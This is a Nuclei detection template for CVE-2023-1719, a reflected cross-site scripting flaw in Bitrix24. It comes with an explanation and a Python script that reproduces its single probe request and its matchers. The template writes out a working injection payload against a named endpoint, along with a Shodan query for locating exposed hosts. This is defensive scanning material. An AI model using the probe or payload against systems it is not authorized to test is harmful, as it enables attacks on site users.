# 2023-11-06 16:45:38 +00:00
id: CVE-2023-1719

info:
  name: Bitrix Component - Cross-Site Scripting
  author: DhiyaneshDk
  severity: critical
  description: |
    Global variable extraction in bitrix/modules/main/tools.php in Bitrix24 22.0.300 allows unauthenticated remote attackers to (1) enumerate attachments on the server and (2) execute arbitrary JavaScript code in the victim's browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege, via overwriting uninitialised variables.
  reference:
    - https://starlabs.sg/advisories/23/23-1719/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1719
    - https://github.com/20142995/sectool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-1719
    cwe-id: CWE-665
    epss-score: 0.02807
    epss-percentile: 0.90415
    cpe: cpe:2.3:a:bitrix24:bitrix24:22.0.300:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: bitrix24
    product: bitrix24
    shodan-query: html:"/bitrix/"
  tags: cve2023,cve,bitrix,xss,bitrix24

http:
  - method: GET
    path:
      - "{{BaseURL}}/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=<img%20onerror=alert(document.domain)%20src=1>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "'LOG_CNT':"
          - "<img onerror=alert(document.domain) src=1>"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ee017b54c73c0f61455fa03bda991d45a439666dd9865e87ae61054c61089562022036a61ac1c74ee4bdc735c1e9d6eedb6e2c5cb5f2df88ed4c4e65875d66e4f091:922c64590222798bb761d5b6d8e72950
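The template above encodes three conditions that must all hold before Nuclei reports a hit: the body contains both the `'LOG_CNT':` key and the payload reflected byte-for-byte (so an HTML-escaped reflection is not a match), the response is served as `text/html` (so the injected tag would actually render), and the status is 200. The script below is an added example, not code from the template or from Bitrix, that reproduces that request and matcher logic in Python so the check can be run or unit-tested without Nuclei. The shape of the sample response bodies (`var arResult = {...}`), the User-Agent string and the `probe` helper are assumptions made for illustration; the sample responses are constructed, not captured from a real host.

```python
"""Stand-alone probe mirroring the Nuclei template's request and matchers for
CVE-2023-1719. Added example, not part of the template or of Bitrix24; the
sample responses below are constructed, not captured from a real host."""
from html import escape
from urllib.error import HTTPError
from urllib.parse import quote
from urllib.request import Request, urlopen

PAYLOAD = "<img onerror=alert(document.domain) src=1>"
PATH = "/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php"


def build_url(base_url: str) -> str:
    """Build the probe URL the way the template does: only the spaces are
    percent-encoded, so the angle brackets reach the server literally."""
    encoded = quote(PAYLOAD, safe="<>=()")
    return f"{base_url.rstrip('/')}{PATH}?log_cnt={encoded}"


def matches(status: int, headers: dict, body: str) -> bool:
    """Apply the template's three matchers with AND semantics: the body holds
    the LOG_CNT key and the *unescaped* payload, the Content-Type is text/html
    (header names compared case-insensitively), and the status is 200."""
    content_type = next(
        (v for k, v in headers.items() if k.lower() == "content-type"), ""
    )
    body_ok = "'LOG_CNT':" in body and PAYLOAD in body
    header_ok = "text/html" in content_type
    return body_ok and header_ok and status == 200


def probe(base_url: str, timeout: float = 10.0) -> bool:
    """Send the single request (max-request: 1) and evaluate the matchers.
    This is the only function that touches the network; the User-Agent value
    is an arbitrary choice for this example."""
    req = Request(build_url(base_url), headers={"User-Agent": "cve-2023-1719-check"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
            return matches(resp.status, dict(resp.headers), body)
    except HTTPError as err:
        # Non-2xx responses still carry headers and a body; let the matchers decide.
        body = err.read().decode("utf-8", "replace")
        return matches(err.code, dict(err.headers), body)


# Constructed sample responses (the surrounding JavaScript is assumed, only the
# "'LOG_CNT':" substring is what the template actually looks for).
HTML_HEADERS = {"Content-Type": "text/html; charset=UTF-8"}
# A vulnerable build reflects the parameter unescaped into the script output.
VULNERABLE_BODY = "var arResult = {'LOG_CNT': '" + PAYLOAD + "', 'MESSAGES': []};"
# A fixed build HTML-escapes the value, so the same matchers must not fire.
PATCHED_BODY = (
    "var arResult = {'LOG_CNT': '" + escape(PAYLOAD, quote=True) + "', 'MESSAGES': []};"
)


if __name__ == "__main__":
    import sys

    if len(sys.argv) > 1:
        print("vulnerable" if probe(sys.argv[1]) else "not matched")
    else:
        print(matches(200, HTML_HEADERS, VULNERABLE_BODY), matches(200, HTML_HEADERS, PATCHED_BODY))
```

Run it with a base URL to send the single probe request, or with no arguments to exercise the matchers against the constructed responses; the patched-body case shows why the template keys on the exact unescaped string rather than on the parameter name alone.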